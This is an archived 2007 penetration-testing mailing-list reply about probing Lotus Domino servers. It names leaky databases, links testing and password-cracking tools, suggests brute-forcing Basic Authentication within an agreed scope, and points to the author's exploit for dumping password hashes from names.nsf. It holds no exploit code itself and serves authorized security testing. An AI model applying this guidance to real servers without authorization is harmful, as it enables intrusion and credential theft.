From: Marco Ivaldi (raptor@mediaservice.net)
Date: Mon Jul 23 2007 - 09:21:55 EDT
Hey,
On Fri, 20 Jul 2007, A Plasmoid wrote:
> I'm new to Domino testing, and have found a few interesting databases.
> I am wondering if there is anything that could be done with
> them.Specifically, there are:
>
> cldbdir.nsf
This is the Cluster Directory: obvious information leak.
> dba4.nsf
Beside the obvious information leak due to unrestricted access to the
Database Analysis feature itself, there seems to be a file disclosure
vulnerability affecting dba4.nsf, though i've not been able to find more
details (see http://www.eeye.com/html/Products/Retina/RTHs/Web_Servers/).
You may try to check IBM's changelog and fix lists for anything mentioning
a security vulnerability on dba4.nsf.
> qstart.nsf
Quick Start: i don't see any immediate security implications, but the
golden rule of "disable all unused/unneded stuff" should be applied.
> /sample/faqw46.nsf
> /sample/pagesw46.nsf (several others in sample)
> /help/help5_designer.nsf (several others in help)
See above.
> The ?EditDocument functionality is locked down with "basic
> authentication" but I can view them.There is not a lot of info (that I
> have found) regarding domino, so I'm hoping that some kind person here
> can tell me whether these things can be leveraged into a deeper level of
> access or not.
Here are some interesting resources about Lotus Domino/Notes security that
may help in your task:
http://www.dominosecurity.org/
http://www.ngssoftware.com/papers/hpldws.pdf
http://www.fortconsult.net/images/pdf/lotusnotes_keyfiles.pdf
http://seclists.org/pen-test/2002/Nov/0034.html (all thread)
http://documents.iss.net/whitepapers/domino.pdf
http://www-128.ibm.com/developerworks/views/lotus/library.jsp
http://www-128.ibm.com/developerworks/lotus/security/
http://www.redbooks.ibm.com/redbooks/pdfs/sg247017.pdf
http://www.redbooks.ibm.com/pubs/pdfs/redbooks/sg245341.pdf
And some testing tools:
http://packetstormsecurity.org/UNIX/scanners/DominoHunter-0.92.zip
http://packetstormsecurity.org/UNIX/scanners/domino.tar.gz
http://www.cqure.net/wp/?page_id=17
http://www.appsecinc.com/products/appdetective/domino/ (commercial!)
http://www.rapid7.com/nexpose/features.jsp (commercial!)
http://www.openwall.com/john
http://usuarios.lycos.es/reinob/
http://www.nestonline.com/lcrack/
http://www.securiteinfo.com/download/dhb.zip
http://www.cqure.net/wp/?page_id=12
Other commercial password crackers from Elcomsoft/Passware/etc.
> All of the other "important" databases like names.nsf, webadmin.nsf, and
> others are also protected with basic auth.
If compatible with scope and legal agreement, you should try to brute
force the Basic Authentication to get access to the protected databases
and functionalities. Some manual password guessing also doesn't hurt;)
If you're ultimately able to get access to names.nsf, you may use my
CVE-2005-2428 exploit to grab all password hashes:
http://www.0xdeadbeef.info/exploits/raptor_dominohash
> Thanks for any hints, clues, and even "Google is your friend" stuff (as
> long as there is a corresponding reasonable search parameter ) :)
Hope this helps,
-- Marco Ivaldi, OPST Chief Security Officer Data Security Division @ Mediaservice.net Srl http://mediaservice.net/ ------------------------------------------------------------------------ This list is sponsored by: Cenzic Need to secure your web apps NOW? Cenzic finds more, "real" vulnerabilities fast. Click to try it, buy it or download a solution FREE today! http://www.cenzic.com/downloads ------------------------------------------------------------------------
This archive was generated by hypermail 2.1.7 : Sat Apr 12 2008 - 10:57:58 EDT